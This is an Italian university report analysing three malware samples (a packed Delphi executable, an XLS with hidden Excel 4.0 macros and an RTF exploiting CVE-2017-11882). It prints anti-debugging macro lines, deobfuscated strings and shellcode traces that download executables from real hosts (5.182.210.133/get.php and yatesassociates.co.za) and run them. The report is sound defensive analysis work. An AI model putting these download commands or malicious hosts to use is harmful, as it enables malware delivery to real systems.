Progetto Codice Malevolo

Antonio Panfili, Sara Beschi

Università degli studi di Verona Ingegneria e scienze informatiche - LM-32/LM-18 antonio.panfili@studenti.univr.it, sara.beschi@studenti.univr.it

Abstract—L'aumento di attacchi informatici e l'alta percentuali di infezioni causate da file malevoli inviati via email attraverso campagne di phishing comporta anche un necessario miglioramento degli strumenti di analisi dei file e delle competenze degli analisti. Il seguente report descrive nel dettaglio, attraverso tecniche di analisi statica e dinamica, il comportamento di tre file malevoli con diversa estensione.

Index Terms—malware, trojan, keylogger, file analysis, macro

I. Introduzione

I file analizzati nel seguente report sono:

- malware.exe
 - md5: f173a6b6ff80ab994a60871009b35eb3
 - sha1: 7c3d06e7ecd756afc0fbaa8e3f875ecc473e2c3b
 - sha256: caaa20071d2693f278d88f78d33eeb4a12a548 d0e4eff646a4ac304915361e10
 - imphash: 36f0bfec2a95b5dc1ce402e9a6332e04
 - file size (bytes): 695808
- maldoc1.xls
 - md5: 73aa1f3101fd1f949e3c75e27d89aa12
 - sha1: 54c0aa43d042af62d591d500bff111db7a32e420
 - sha256: d864b4da58253cba29a8106b0727e81852a18
 1f3ac59ec7dfb9b9dee5931b7cc
 - file size (bytes): 97285
- maldoc2.doc
 - md5: 3a323aa356501b077b5686ecc4af6725
 - sha1: 52dbadafe3d975a6122fa31799ebf0caa60ef447
 - sha256: b98b7be0d7a4004a7e3f22e4061b35a56f825 fdc3cba29248cf0500beca2523d
 - file size (bytes): 367718

Il report descrive l'analisi completa di un file dopo l'altro. Le analisi sono condotte eseguendo prima quella statica nel tentativo di osservare anomalie e trarre quanto meno delle supposizioni sul comportamento del file e successivamente quella dinamica per approfondire il controllo e confermare le eventuali supposizioni.

A. Strumentazione

Le analisi sono state eseguite su due Virtual Machine (VM) VirtualBox¹:

- · Malware:
 - OS: Windows 10 (64 bit)
 - RAM: 4096 MB

- CPU: Intel(R) Core(TM) i7-7700HQ
- REMnux v7:
 - OS: Ubuntu 20.04 (64 bit)
 - RAM: 4096 MB
 - CPU: Intel(R) Core(TM) i7-7700HQ

II. MALWARE.EXE

A. Analisi Statica

L'analisi statica è stata condotta principalmente attraverso l'utilizzo del tool PeStudio (v9.18)².

L'eseguibile risulta compilato in data *Sat Jun 20 00:22:17 1992* con firma *BobSoft Mini Delphy -> Bob / BobSoft*³ ed entropia pari a 7.169.

Tale dato è confermato anche utilizzando il software Exeinfo PE di A.S.L. (v0.0.6.5)⁴.

Possiamo quindi affermare che il malware è impacchettato con *BobSoft Mini Delphy -> Bob / BobSoft* [8] [9]. Lo possiamo dedurre anche dall'entropia della sezione "rsrc" (superiore a 7) e dalla presenza di file nella sezione "rsrc": *Delphy, offset*.

- 1) Analisi delle sezioni: Scendendo in dettaglio nelle sezioni che compongono l'eseguibile evidenziamo alcune particolarità:
 - Le sezioni "BSS" e "tls" risultano di dimensione pari a 0b.
 - Le sezioni "BSS" e "tls" sono sezioni "virtualized".
 - L'entropia della sezione "rsrc" risulta superiore a 7.0 (7.403).
 - La sezione "rsrc" contiene dei file che risultato pacchettizzati con Delphi.
 - Le sezioni "rdata", "rsrc", "rloc" sono sezioni "shareable".
- 2) Analisi delle funzioni: Continuando l'analisi delle funzioni importate dall'eseguibile notiamo la presenza di alcune funzioni potenzialmente pericolose se utilizzate per scopi malevoli:
 - FindFirstFileA : ricerca il percorso di un file tramite parametro A.
 - GetCurrentThreadId : ottiene l'identificativo del thread
 creato

¹https://www.virtualbox.org

²https://www.winitor.com/download

³https://securityintelligence.com/news/threat-actors-use-delphi-packer-to-shield-binaries-from-malware-classification

⁴http://exeinfo.booomhost.com

- GetKeyboardType: ottiene il modello/tipo della tastiera in uso.
- GetThreadLocale : ottiene l'identificativo locale dello stato locale di chiamata del thread.
- RaiseException: genera un'eccezione nel thread chiamante.
- WriteFile : permette la scrittura di dati su file.

Oltre alle precedenti evidenziate da PeStudio come blacklisted, segnaliamo anche la presenza di GetModuleFileNameA, Get ModuleHandleA, GetProcAddress, LoadLibraryExA, VirtualAlloc.

3) Analisi delle stringhe: Utilizzando la lista di stringhe presenti nell'eseguibile e fornita da PeStudio si nota la presenza di nomi di funzioni utilizzate come listener di eventi legati all'interfaccia grafica come OnClick, OnKeyPress. Sono presenti anche molti riferimenti a costrutti grafici tra cui bottoni, form, radio buttons e ad eventi da tastiera come Shift, Enter, Space, Right ... Si noti anche la presenza di una stringa alfanumerica che comprende tutti i numeri da 0 a 9 e tutte le lettere maiuscole dalla A alla Z. PeStudio evidenzia 41 stringhe blacklisted tra le quali i seguenti nomi di funzioni: GetProcessId, GetMonitorInfo, GetCapture, GetKeyboardState.

Utilizzando il software XORSearch (v1.11.4)⁵ per la ricerca di stringhe contenenti urls, collegamenti ftp e ssh i risultati sono stati inconcludenti:

```
Found ROT 22 position 6ECF8:
HTTp.g81]z.....LyU2./..>..-ER.5r.1y`T_$$..
.....
Found ADD 04 position 6ECF8:
HTTp.g<laz.....LyU6.3..B..1.ER.9r.5ydTc((...
```

Ad attirare l'attenzione è anche la presenza di molteplici chiamate a funzione per la gestione di liste di icone (Im ageList_Create , ImageList_Write ...) e bitmap (Cre ateBitmap , CreateDIBitmap). L'eseguibile sembrerebbe utilizzare la libreria **GraphicEx**⁶ di Mike Lischke sviluppata per la gestione delle immagini in linguaggio Delphi⁷. Questa deduzione è fatta avendo trovato tra le stringhe la scritta 2001, 2002 Mike Lischke .

B. Analisi Dinamica

L'analisi dinamica è stata condotta partendo con la registrazione del comportamento dell'eseguibile attraverso l'utilizzo dei software Regshot (v.1.9.0 x86 Unicode)⁸ e Process Monitor (v.3.52)⁹. Attraverso l'analisi della registrazione dei primi 10 minuti di esecuzione del file malware.exe, abbiamo potuto notare la creazione di molteplici file con varie estensioni tra cui Object Description Language (ODL), LOG, Temporary file (TMP). Vengono inoltre letti e modificati

svariati valori e chiavi di registro di sistema attraverso la creazione di molteplici thread.

TABLE I SINTESI AZIONI COMPIUTE DAL FILE MALWARE.EXE

Operazione	Numero di occorrenze	
Keys deleted	2	
Keys added	5	
Values added	12	
Values modified	72	
Files added	7	
Files deleted	2	
Files [attributes?] modified	73	
Total changes	173	

Nella lunga lista di modifiche ci sono numerose operazioni di creazione e modifica all'interno del percorso C:\Users\malware\AppData\Loca\Microsoft.

Il dump completo dell'analisi eseguita attraverso il software Regshot è stato caricato nel repository https://github.com/Fantantonio/CM-Repo/blob/master/exe/exe_regshot.txt assieme ad altri documenti prodotti durante l'analisi dei tre file.

Attraverso la completa analisi del malware non si notano richieste con destinatari sospetti. Anche utilizzando sistemi di reverse engineering attraverso gli strumenti IDA¹⁰, x32dbg¹¹ e Ghidra¹² non è stato individuato alcun Internet Protocol (IP) o URL. Tuttavia sono state riscontrate chiamate a funzioni WriteFile , LoadStringA , MessageBoxA , GetModuleFileName , GetProcAddress . Inoltre è stata notata la richiesta alla DLL UrlMon contenente la funzione URLDownloadToFileA che permetterebbe al file di contattare un URL remoto per scaricare file malevoli.

È probabile che le funzionalità malevole del software siano state offuscate e che il software sia in grado di annullare la sua esecuzione attraverso tecniche di anti debugging ed esecuzione in caso notasse software comunemente utilizzati per l'analisi di malware o il fatto di essere eseguito in un ambiente virtuale.

C. Conclusioni

Possiamo presumere, a conclusione dell'analisi statica, che il file eseguibile sia potenzialmente malevolo. Per prima cosa si noti come la data di compilazione risulti precedente all'uscita sul mercato dei requisiti minimi richiesti per l'esecuzione del software stesso. Modificare la data di compilazione del file per far si che non risulti un file nuovo è una tecnica utilizzata spesso dai cybercriminali. Il file inoltre importa funzioni necessarie alla gestione e modifica della memoria. L'eseguibile ha quindi la possibilità di creare, scrivere ed eliminare file, gestire processi e thread, registrare eventi da tastiera oltre che a catturare la schermata della macchina su cui è in esecuzione. La sola analisi statica non ci ha permesso di scoprire se l'eseguibile ha la possibilità

⁵https://github.com/DidierStevens/FalsePositives

⁶https://github.com/mike-lischke/GraphicEx

⁷https://www.embarcadero.com/products/delphi

⁸https://github.com/Seabreg/Regshot

⁹https://docs.microsoft.com/en-us/sysinternals/downloads/procmon

¹⁰https://hex-rays.com/ida-free

¹¹ https://github.com/x64dbg/x64dbg

¹²https://ghidra-sre.org

di contattare un web server attraverso protocollo Hypertext Transfer Protocol (HTTP), Hypertext Transfer Protocol Secure (HTTPS), File Transfer Protocol (FTP) o Secure Shell Protocol (SSH) ma è possibile che parte del codice sia stato offuscato attraverso l'utilizzo di un algoritmo dedicato. Sono infatti state trovate stringhe di questo tipo: 0123456789ABCDEF , 1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ .

Oppure è possibile che tale codice sia contenuto nella sezione rsrc impacchettata con *BobSoft Mini Delphy -> Bob / BobSoft.* Tale sistema è diventato molto popolare ultimamente per impacchettare file malevoli sia perché facilita la runtime evasion quando eseguito in ambienti sandbox, sia perché sistemi come UPX¹³, a confronto, non forniscono le stesse funzioni di evasione ma solo di compressione [1]. Il fatto che tale sezione sia impacchettata è confermato dal valore di entropia che risulta superiore a 7. L'analisi dinamica condotta su VM non ha prodotto risultati significativi così come l'analisi della rete tuttavia, facendo riferimento ai report di C2AE, Microsoft Sysinternals e Zenbox¹⁴ pubblicati in riferimento allo stesso file (stesso hash code), il malware risulta comunicare con vari URL tra cui mdx2893.3utilities.com , login.live.com , prda.aadg.msidentity.com .

Sembrerebbe inoltre raggiungere persistenza scrivendo un file eseguibile/copiando sé stesso al seguente percorso %APP-DATA%\appdata\sdfghj.exe e sfruttando una vulnerabilità dei software Microsoft Office con il file .doc scaricato da uno dei domini sopra indicati. La stessa vulnerabilità che il file scaricato dal malware dovrebbe sfruttare è la stessa sfruttata dal malware analizzato nella sezione IV.

III. MALEDOC1.XLS

A. Analisi statica

L'analisi di anteprima del file *maldoc1.xls* eseguita con il comando:

file maldoc1.xls

conferma il fatto che il documento sia stato scritto con il software Microsoft Excel¹⁵:

maldoc1.xls: Composite Document File V2 Document, Little Endian, 0s: Windows, Version 10.0, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Jul 2 16:46:44 2020, Last Saved Time/Date: Thu Jul 2 19:57:38 2020, Security: 0

1) Analisi dei metadati: Utilizzando il software Exiftool (v12.16)¹⁶ per ottenere i meta dati associati al file eseguendo il comando exiftool maldoc1.xls, si ottengono le informazioni riassunte in tabella II.

TABLE II
OUTPUT EXIFTOOL MALDOC1.XLS

Dato	Valore
File Size	95 KB
File Modification Date/Time	2022:05:30 14:18:20-04:00
File Access Date/Time	2022:06:17 09:44:15-04:00
File Access Inode Change Date/Time	2022:06:17 09:43:17-04:00
File Type	XLS
MIME Type	application/vnd.ms-excel
App Version	16.0000
Heading Pairs	Worksheets, 1,
	Excel 4.0 Macros, 1

2) Analisi delle stringhe: L'analisi delle stringhe con il comando strings produce un output poco significativo. Si riesce ad individuare solamente un link paint.net che attualmente risulta in vendita sul provider GoDaddy¹⁷ ed a due stringhe contenenti alcuni caratteri speciali, numeri e lettere maiuscole e minuscole dalla "C" alla "Z" (vedi figura 1).

paint.net 4.2.12
\$3br
%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
#3R
&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz

Fig. 1. Output comando strings su file maldoc1.xls.

3) Analisi dei pattern: L'analisi dei pattern è stata condotta con Yara (v4.0.2).

Tuttavia il comando:

yara -w -f -e -s -g index.yar maldoc1.xls non produce alcun output.

4) Oletools e De-offuscamento: Il comando oleid mal doc1.xls conferma che il file è di tipo Object Linking and Embedding (OLE) ed in particolare "Microsoft Excel". Sembrerebbe tuttavia che non contenesse delle macro dato che il tool, alla voce corrispondente, ritorna False. Allo stesso modo anche lo script oledump.py non rileva alcuna macro ritornando l'output:

- 1: 4096 '\x05DocumentSummaryInformation'
- 2: 4096 '\x05SummaryInformation'
- 3: 86562 'Workbook'

Inoltre risulta sospetto che il comando oletime maldoc1.xls non riesca a fornire alcuna informazione utile.

L'esecuzione del comando olevba maldoc1.xls fornisce però dei dettagli riguardo la presenza di stringhe offuscate in esadecimale e Base64¹⁸ oltre che della keyword Windows potenzialmente malevola dato che può essere utilizzata per elencare le finestre dell'applicazione se combinata con l'oggetto Shell.Application e della keyword Auto_Open che permette l'esecuzione di codice all'apertura del Workbook Excel.

¹³https://upx.github.io

¹⁴https://www.virustotal.com/gui/file/caaa20071d2693f278d88f78d33eeb4a 12a548d0e4eff646a4ac304915361e10/behavior/Zenbox

¹⁵https://www.microsoft.com/en-us/microsoft-

^{365/}excel?SilentAuth=1&wa=wsignin1.0

¹⁶https://exiftool.org

¹⁷ https://whois.domaintools.com/paint.net

¹⁸https://developer.mozilla.org/en-US/docs/Glossary/Base64

B. Analisi dinamica

1) Analisi di rete: Per l'esecuzione dell'analisi di rete, è stata utilizzata anche in questo caso la VM REMnux con il software Wireshark (v.3.4.9)¹⁹ in ascolto sulla rete interna alla quale sono state connesse le due VM.

Aprendo il documento sia con il software LibreOffice (v7.3)²⁰ che con OpenOffice (v4.1.12)²¹ che con Microsoft Excel, tutti con attivata l'impostazione di esecuzione automatica delle macro, non è stata rilevata alcuna richiesta ad indirizzi IP sospetti.

C. Analisi della macro

Tuttavia, aprendo il documento con il software Microsoft Excel, anch'esso configurato per permettere l'esecuzione di macro Visual Basic for Applications (VBA) ed Excel 4.0, si riscontra la presenza di un "WorkBook" nominato "VR" contenente una macro Excel 4.0 (scritta nel linguaggio di scripting Excel Macro Language (XLM) di Microsoft²²). Usando i seguenti comandi via PowerShell, eseguita come amministratore:

\$XLSPath = 'C:\Users\TestUser\Desktop\maldoc1.xls'

```
# Carica la classe Excel COM che permette di
ispezionare lo spreadsheet
$Excel = New-Object -ComObject 'Excel.Application'
```

```
# Apre lo spreadsheet sospetto
$WorkBook = $Excel.Workbooks.Open($XLSPath)
```

Controlla la presenza di pagine contenenti macro Excel 4.

\$WorkBook.Excel4MacroSheets

```
# Estrae la pagina con macro Excel 4 trovata con il nome "VR".
```

```
$Excel4MacroSheet = $WorkBook.Excel4MacroSheets.
Item('VR')
```

Il codice sparso tra le centinaia di migliaia di celle della pagina. "11" corrisponde all'ultima cella.

\$LastCell = \$Excel4MacroSheet.Cells.SpecialCells(11)

```
# Ottiene le celle tra le quali contenuto codice
$AllUsedCells = $Excel4MacroSheet.Range($Excel4MacroSheet.Cells(1,1), $LastCell)
```

Con solo le celle contenenti formule
\$CellArray = New-Object -TypeName 'System.Collect
ions.Generic.List'1[Object]'

```
# Estrae solo le celle contenenti formule (iniziano
con "=" nel linguaggio XLM)
$PopulatedCell = $AllUsedCells.Find('=*')
# Salva riga/colonna della prima cella trovata
interrompere il loop seguente
$FirstRow = $PopulatedCell.Row
$FirstColumn = $PopulatedCell.Column
# Trova tutte le celle con formule definite
do {
  $CellArray.Add($PopulatedCell)
  $PopulatedCell = $PopulatedCell.Find('=*')
} while (-not (($PopulatedCell.Row -eq $FirstRow)
-and ($PopulatedCell.Column -eq $FirstColumn)))
# Estrae e visualizza il nome della prima cella che
 eseguita
$AutoOpenCell = $CellArray | ? { $_.Name -and
$_.Name.Name.StartsWith('Auto') }
$AutoOpenCell.Name.Name
# Visualizza la posizione della funzione AutoOpen
e chiude il file
$AutoOpenCell.Row
$AutoOpenCell.Column
$WorkBook.Close()
$Excel.Quit()
è stato possibile trovare la posizione della funzione AutoOpen
(riga: 57255, colonna: 98) che non è stato possibile ottenere
attraverso la funzione di Excel (Ctrl+G).
Analizzando la macro con il blocco di esecuzione attivo, si
è notata la presenza di alcune condizioni di controllo anti
debugging:
=APP.MAXIMIZE()
=IF(GET.WINDOW(7),$BU$1047(),)
=IF(GET.WINDOW(20),,$BU$1047())
=IF(GET.WINDOW(23)<3,$BU$1047(),)
=IF(GET.WORKSPACE(31),$BU$1047(),)
=IF(GET.WORKSPACE(13)<770,$BU$1047(),)
=IF(GET.WORKSPACE(14)<380,$BU$1047(),)
=IF(GET.WORKSPACE(19),,$BU$1047())
=IF(GET.WORKSPACE(42),,$BU$1047())
```

=\$FB\$48599()
La funzione GET.WORKSPACE(31), per esempio, ritorna il valore booleano corrispondente all'esecuzione della macro in "single step mode".

=IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))),

\$BU\$1047())

Sostituendo alla seconda riga la funzione =HALT, è stato possibile abilitare l'esecuzione della macro facendola terminare istantaneamente potendo così eseguire il debug con le funzionalità messe a disposizione da Excel stesso.

¹⁹https://www.wireshark.org

²⁰https://www.libreoffice.org

²¹https://www.openoffice.org

 $^{^{22}} https://d13ot9o61jdzpp.cloudfront.net/files/Excel%204.0%20Macro%20Functions%20Reference.pdf$

²³https://gist.github.com/mattifestation/15bd6bbb26becb2e49461400e7bd8c

Attraverso l'attività di debug si è notata il calcolo di valori numerici poi trasformati nel corrispondente carattere ASCII dalla funzione =RETURN(CHAR(FaQHVf00Bn0kx-266 (riga: 42670, colonna: IB) utilizzati per la generazione di stringhe in runtime.

La macro originale termina con il comando =HALT (riga: 57269, colonna: CT). Spostando tale comando più in basso ed inserendo dei comandi:

=SET.VALUE(\$A\$1, CWMDR)

=SET.VALUE(\$A\$2, yzgnGOEj)

=SET.VALUE(\$A\$3, HhEQfMd)

=SET.VALUE(\$A\$4, DLYzU)

=SET.VALUE(\$A\$5, hxCEvVk)

=SET.VALUE(\$A\$6, abZePIP)

=SET.VALUE(\$A\$7, NQTLky)

=SET.VALUE(\$A\$8, S1fVB)

=SET.VALUE(\$A\$9, wToNT)

=SET.VALUE(\$A\$10, xtGWl)

=SET.VALUE(\$A\$11, nzQRm)

=SET.VALUE(\$A\$12, dDfKI)

=SET.VALUE(\$A\$13, hMZYor)

=SET.VALUE(\$A\$14, wXJZcfXwZ)

=SET.VALUE(\$A\$15, UsLXL)

=SET.VALUE(\$A\$16, BXvnj)

=SET.VALUE(\$A\$17, SsrIxBsR)

=SET.VALUE(\$A\$18, FPKmD)

=SET.VALUE(\$A\$19, uoHpNwHNJ)

=SET.VALUE(\$A\$20, wehCeiwHc)

=SET.VALUE(\$A\$21, HjoCN)

=SET.VALUE(\$A\$22, tmtYlkB)

=SET.VALUE(\$A\$23, yKEWT)

=SET.VALUE(\$A\$24, BZROZ)

nelle righe prima, sfruttando l'esecuzione riga per riga dello script, è stato possibile salvare nelle prime righe i valori generati in runtime.

Le variabili di cui si è salvato il valore sono state trovate cercando tutte le stringhe contenenti e"" questo perché si è notato attraverso la fase di debug che vengono utilizzate variabili inizializzate a stringa vuota per il salvataggio delle stringhe generate a runtime.

Utilizzando i comandi PowerShell precedente con le opportune modifiche è stato possibile scaricare con il comando \$CellArray.Formula | Out-File Excel4Deobfuscated.txt tutte le celle non vuote del file XLS.

Le stringhe generate a runtime sono:

CreateDirectoryA

Kernel32

JJCCCCJ

C:\JrreRsP\bpXoaeE

GLTIowxv

ShellExecuteA

URLMON

0pen

DownloadFile

SeHaGdvV

JCJ

QLMKPzHO

C:\JrreRsP

INSENG

Shell32

rundll32.exe

JJCCJJ

http://5.182.210.133/get.php

URLDownloadToFileA

C:\JrreRsP\bpXoaeE\yujEtky.exe

regsvr32.exe

BCCJ

VanyTgUG

C:\JrreRsP\bpXoaeE\yujEtky.exe

Tra loro sono presenti l'url:

http://5.182.210.133/get.php , dei percorsi a cartelle nel disco "C:", dei nomi di eseguibili, delle chiamate alle Windows Application Programming Interface (API) tra cui la URLDownloadToFile che permette il download di bits da internet ed il salvataggio su file²⁴, ed a funzioni di varie DLL.

Eseguendo ora l'analisi di rete ed analizzando l'output del programma RegShot, utilizzando il file modificato e lanciando la macro dopo i controlli descritti sopra, otteniamo la conferma della creazione del file C:\IrreRsP\bpXoaeE\yujEtky.exe, della modifica ed aggiunta di vari valori e chiavi nei registri di sistema e del tentativo di comunicazione attraverso protocollo HTTP con l'indirizzo IP 5.182.210.133 eseguendo una richiesta GET alla pagina get.php.

D. Conclusioni

Avendo scoperto l'utilizzo della funzione UrlDownload ToFile ed avendo rilevato traffico TCP e richieste HTTP di tipo GET, si può dire che il file, agendo con la tecnica di esecuzione "Exploitation for Client Execution" sfrutti la vulnerabilità dei sistemi all'esecuzione di macro Excel 4.0 per collegarsi ad un server esterno presumibilmente per scaricare altri file malevoli.

L'utilizzo delle macro Excel 4.0 permette l'esecuzione di codice malevolo all'apertura del file malevolo da parte del software di Microsoft ed è stato già utilizzato da vari attacchi noti [6] [7].

IV. MALDOC2.DOC

A. Analisi statica

Il primo comando utilizzato per l'analisi del file *maldoc2.doc* è:

file maldoc2.doc

Che ritorna una semplice anteprima:

maldoc2.doc: Rich Text Format data, version 1,
unknown character set

da cui ci si accorge che l'estensione .doc non corrisponde al

²⁴https://docs.microsoft.com/en-us/previous-versions/windows/internet-explorer/ie-developer/platform-apis/ms775123(v=vs.85)

²⁵https://attack.mitre.org/techniques/T1203

reale contenuto del file che risulta invece essere un .rtf.

1) Analisi dei metadati: Utilizzando il software Exiftool per ottenere i meta dati associati al file eseguendo il comando exiftool maldoc2.doc , si ottengono le informazioni riassunte in tabella III.

TABLE III
OUTPUT EXIFTOOL MALDOC2.DOC

Dato	Valore
File Size	359 KB
File Modification Date/Time	2022:05:30 14:04:42-04:00
File Access Date/Time	2022:06:15 09:55:27-04:00
File Access Inode Change Date/Time	2022:06:15 09:53:35-04:00
File Type	RTF
MIME Type	text/rtf
Warning	Unspecified RTF encoding.
	Will assume Latin

- 2) Analisi delle stringhe: L'analisi delle stringhe condotta con il comando strings maldoc2.doc risulta inconcludente; allo stesso modo cercando stringhe specifiche con il software xorsearch non si ottengono risultati significativi nemmeno con un reverse del file.
- *3) Analisi dei pattern:* L'analisi basata sui pattern è eseguita attraverso l'utilizzo del software Yara e le regole presenti nel repository Yara-Rules²⁶.

L'output del comando:

yara -m -w -s index.yar ../maldoc2.doc avvisa della possibile presenza di "shellcode" nel file: RTF_Shellcode [author="RSA-IR \342\200\223 Jared Greenhill", date="01/21/13", descrip tion="identifies RTF\'s with potential shellcode", filetype="RTF"] ../maldoc2.doc

4) Oletools e De-offuscamento: Il secondo strumento utilizzato per valutare il potenziale malevolo del file è lo script oleid²⁷.

Il comando oleid maldoc2.doc conferma che il file non è di tipo Object Linking and Embedding (OLE) e quindi non è possibile utilizzare gli altri script di controllo oletools²⁸ sul file così com'è.

Il software ViperMonkey (v1.0.3)²⁹ conferma ulteriormente che il formato del file è l'RTF consigliando l'utilizzo dello script rtfobi³⁰.

Con il comando: rtfdump.py maldoc2.doc si ottengono varie posizioni in memoria contenenti potenzialmente oggetti OLE.

Estraendo l'oggetto 8:

8 Level 3 c= 2 p=000001b0 l= 367282 h=367102; 367025 b= 0 0 u= 0 *\objdata

Name: b'eqUATIOn.3\x00' Size: 183508 md5: c61c0fb12927efee5b4f2ef6b0b7aef6 magic: 03edb2f1 con il comando:

rtfdump.py -s 8 -H maldoc2.doc -x >
doc_rtfdump_hex.txt

per analizzarlo nello specifico, ci si accorge che contiene i caratteri D0 CF 5D E0, molto simile alla firma D0 CF 11 E0 del formato "Compound Binary File" di Microsoft utilizzato da molti oggetti OLE³¹. Tuttavia, non è la firma di un valido OLE file.

Con il comando:

rtfobj -s maldoc2.doc -d dump

Si possono ottenere però i dati grezzi, "raw data", che compongono l'oggetto.

Il file creato nella cartella dump corrisponde proprio all'oggetto OLE non ben formattato con index 000001BBh . Utilizzando il software scDbg³² sul file maldoc2.doc alla ricerca di shellcode si ottengono 9 sezioni di cui il codice assembly esportato è:

401d3f 52 push edx

401d40 36BD145DDCC8 ss mov ebp,0xc8dc5d14

401d46 3F aas

401d47 59 pop ecx

401d48 29D1 sub ecx, edx

4034d0 794F jns 0x403521 vv

4034d2 849E8B9D74D9 test [esi-0x268b6275],bl

4034d8 8F8063EFD469 pop dword [eax+0x69d4ef63]

4034de db C5

4034df ED in eax,dx

403513 187C07E2 sbb [edi+eax-0x1e],bh

403517 13FB adc edi,ebx

403519 8996A3F51AD5 mov [esi-0x2ae50a5d],edx

40351f 57 push edi

403520 DD27 frstor [edi]

0 error accessing 0xffffffe2 not mapped

0 ???? No memory At Address step: 0 foffset: 0

eax=0 ecx=0 edx=0 ebx=0

esp=12fe00 ebp=12fff0 esi=0 edi=0 EFL 0

403517 13FB adc edi,ebx

403519 8996A3F51AD5 mov [esi-0x2ae50a5d],edx

40351f 57 push edi

403520 DD27 frstor [edi]

403522 96 xchg eax,esi

4034d0 794F jns 0x403521 vv step: 958092998 foffset: 24d0

eax=0 ecx=0 edx=0 ebx=0

esp=12fdfc ebp=12fff0 esi=0 edi=0 EFL 44 P Z (jump taken)

403519 8996A3F51AD5 mov [esi-0x2ae50a5d],edx

40351f 57 push edi

403520 DD27 frstor [edi]

403522 96 xchg eax,esi

403523 7DAB jnl 0x4034d0 ∧∧

²⁶https://github.com/Yara-Rules/rules

²⁷https://github.com/decalage2/oletools/wiki/oleid

²⁸https://github.com/decalage2/oletools

²⁹https://github.com/decalage2/ViperMonkey

³⁰https://github.com/decalage2/oletools/blob/master/oletools/rtfobj.py

³¹https://www.garykessler.net/library/file_sigs.html

³²http://sandsprite.com/blogs/index.php?uid=7&pid=152

```
40351d 1AD5 sbb dl,ch
403525 FA cli
403526 9B wait
403527 23F0 and esi,eax
403529 C02B1C shr byte [ebx],0x1c
40353e BE5E87F4A3 mov esi,0xa3f4875e
403543 50 push eax
403544 2D3B2CAF31 sub eax,0x31af2c3b
403549
             C68FF4CA4D45F0
                                              byte
                                   mov
[edi+0x454dcaf4],0xf0
403550 643A77C2 cmp dh,fs:[edi-0x3e]
403550 error accessing 0x7ffdefc2 not mapped
403550
        643A77C2 cmp dh,fs:[edi-0x3e] step:
foffset: 2550
eax=ce50d3c5 ecx=0 edx=0 ebx=0
esp=12fdfc ebp=12fff0 esi=a3f4875e edi=0 EFL 85 C
403554 21C9 and ecx,ecx
403556 EBC8 jmp 0x403520 ∧∧
403558 DB17 fistl [edi]
40355a 46 inc esi
```

B. Analisi della macro

Il file quindi contiene dello shellcode ma ciò che è stato fatto fin qui non è sufficiente a definire il comportamento dello stesso. Per comprenderne il comportamento è necessario ottenere lo shellcode generato in runtime così da poter leggere chiaramente le chiamate a funzione effettuate durante l'esecuzione.

Utilizzando il comando xorsearch -W maldoc2.raw, per cercare "wildcards" all'interno del file di dati grezzi esportato in precedenza, si ottiene il seguente output:

```
Found XOR 00 position 0002C760: GetEIP method 3
E996000000
Found XOR 00
             position 0002C912: GetEIP method 3
E9E4FEFFF
                                        method 3
Found ROT 02
             position 0002C760: GetEIP
E996000000
Found ROT 02 position 0002C912: GetEIP
                                        method 3
E9E4FEFFF
Found ROT 01 position 0002C760: GetEIP method 3
E996000000
             position 0002C912: GetEIP method 3
Found ROT 01
E9E4FEFFF
Score: 60
```

Due XOR sono stati trovati agli indirizzi 2C760 e 2C912. Utilizzando ora scDbg, con offset corrispondente alla posizione del primo XOR, eseguendo il comando:

scdbg /f maldoc2.raw /foff 2C760

si ottiene lo shellcode in chiaro:

Max Steps: 2000000

Using base offset: 0x401000

Execution starts at file offset 2c760 42d760 E996000000 jmp 0x42d7fb vv 42d765 E9DB020000 jmp 0x42da45 vv

```
42d76a EB0F jmp 0x42d77b vv
42d76c EB03 jmp 0x42d771 vv
42d76e 83623DE9 and dword [edx+0x3d],0xffffffe9
```

```
42dae0 GetProcAddress(ExpandEnvironmentStringsW)
42db15 ExpandEnvironmentStringsW(%APPDATA%\WRT.exe,
dst=12fad8, sz=104)
42db2a LoadLibraryW(UrlMon)
42db45 GetProcAddress(URLDownloadToFileW)
42dbb9 URLDownloadToFileW(http://yatesassociates.co
.za/documentato/MLY.exe, C:\Users\malware\AppData\R
oaming\WRT.exe)
42dbd5 GetProcAddress(WideCharToMultiByte)
42dbf3 WideCharToMultiByte(0,0,in=12fad8,sz=fffffffff,out=12fcf4,sz=104,0,0) = 0
42dc03 GetProcAddress(WinExec)
42dc23 GetProcAddress(ExitProcess)
42dc27 ExitProcess(0)
```

Stepcount 40909

Leggendo lo shellcode si nota facilmente come il malware tenti di accedere a DLL di sistema per sfruttare le loro funzioni così da contattare il server remoto http://yatesassociates.co.za/documentato/MLY.exe con l'obiettivo di scaricare un file eseguibile (MLY.exe) e salvarlo in C:\Users\malware\AppData\Roaming\WRT.exe raggiungendo, con tutta probabilità, persistenza sul sistema vittima.

C. Analisi dinamica

1) Analisi di rete: Eseguendo l'analisi di rete sia con il software FakeNet (v.1.4.3)³³ sia mettendo in comunicazione su intranet le due VM (Windows e Ubuntu) con INetSim (v.1.3.2)³⁴ per poi controllare il traffico di rete con il software Wireshark non si rilevano richieste sospette.

È probabile che il malware abbia un sistema di auto protezione per evitare l'esecuzione su determinati sistemi in mancanza di particolari specifiche o risultanti delle sandbox.

D. Conclusioni

Dall'analisi eseguita si può concludere che il file è malevolo e sfrutta la vulnerabilità nota CVE-2017-11882³⁵ (punteggio CVSS 3.1 di 7.8), nota anche come "Microsoft Office Memory Corruption Vulnerability", per sfruttare versioni specifiche di Microsoft Office (Service Pack 3, 2010 Service Pack 2, 2013 Service Pack 1 e Office 2016) per eseguire codice malevolo sul sistema vittima.

La vulnerabilità è causata da uno "stack buffer overflow" quando eqnedt32.exe, il componente dedito alla modifica delle formule, non controlla la lunghezza del nome del font della formula mentre legge i dati OLE contenenti "MathType" [3].

³³https://sourceforge.net/projects/fakenet

³⁴https://www.inetsim.org

³⁵https://nvd.nist.gov/vuln/detail/CVE-2017-

^{11882#}vulnCurrentDescriptionTitle

Attacchi che sfruttano questa vulnerabilità sono sfruttati anche da malware noti come Agent Tesla [4] e Lokibot [5]. In questo caso il codice malevolo tenta di raggiungere persistenza sul sistema e comunicare con un server C2.

ACRONYMS

Α	.PI	Application Programming Interface. 5
C	2	Command and Control. 8
C	PU	Central Processing Unit. 1
C	VSS	Common Vulnerability Scoring System. 7
D	LL	Dynamic-link library. 2, 5, 7
